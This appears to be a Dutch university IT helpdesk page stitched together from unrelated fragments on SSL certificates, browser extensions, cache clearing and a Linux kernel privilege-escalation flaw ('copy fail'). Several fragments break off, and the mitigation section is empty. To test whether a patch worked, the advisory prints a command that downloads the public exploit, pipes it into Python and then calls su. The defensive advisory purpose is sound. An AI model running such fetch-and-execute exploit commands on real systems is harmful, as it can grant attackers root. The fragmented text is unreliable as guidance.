Om je webserver te beveiligen met https moet je ervoor zorgen dat je correct werkende SSL certificaten hebt.
UGent medewerkers kunnen zelf een certificaat maken en laten ondertekenen. Een alternatief is het gebruiken van LetsEncrypt om certificaten aan te vragen en automatisch te vernieuwen.
Tegenwoordig hebben recente versies van webservers zoals Apache ingebouwde ondersteuning hiervoor. Het is dus niet nodig om b.v. certbot te gebruiken voor het verwerken van LetsEncrypt certificaten. Zie bijvoorbeeld deze tutorial. Op Windows kan je dit ook gebruiken.
Volg onderstaande instructies om schadelijke of onbekende browser extensies te verwijderen.
Lexicon
Hoe verwijderen?
De manier om je cache, cookies en geschiedenis te verwijderen is afhankelijk van de browser die je gebruikt:
Dit gaat langere tijd lopen maar je kan gerust verderwerken (mogelijks werkt de laptop wel iets trager door de scan in de achtergrond).
We kregen de vraag hoe men zeker kan zijn of de patch of mitigation acties geslaagd zijn. De documentatie op https://copy.fail/ beschrijft hoe je de exploit kan uitvoeren. Indien je hierbij een fout krijgt werkt de exploit niet en is je mitigation of patching gelukt. Voorbeeld:
user@laptop:~$ curl https://copy.fail/exp | python3 && su
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
Er is een kritieke kwetsbaarheid vastgesteld in de Linux kernel, aangeduid met CVE-2026-31431 en gekend met de naam “copy fail”. Hiermee kunnen “root”-rechten verkregen worden op het systeem door het uitvoeren van een kort Python-script dat een kwetsbaarheid in de Linux Crypto API (AF_ALG) misbruikt.
Op dit moment zijn er voor de meeste distro’s nog geen patches beschikbaar. We verwachten deze in de loop van de komende dagen. Hou hiervoor de kanalen voor jouw distro in de gaten en patch zodra deze beschikbaar is.
Voor systemen die nog kernel-updates uitbrengen en die je kan upgraden, patch deze zo snel mogelijk. Voor systemen die “end of life” zijn is het nodig de mitigatie zoals hieronder vermeld toe te passen. Systemen met een hoger risico passen best ook de mitigatie toe zolang de kernel niet gepatched is.
Het gevaar bestaat dat een systeem dat nu niet gepatcht wordt in de toekomst via een minder kritieke kwetsbaarheid direct overgenomen kan worden. Vandaar dat ieder Linux-systeem zo snel mogelijk gepatcht moet worden.
Mitigatie
Medewerkers en studenten vinden algemene informatie over IT-security op Beveiliging (ICT Helpdesk website).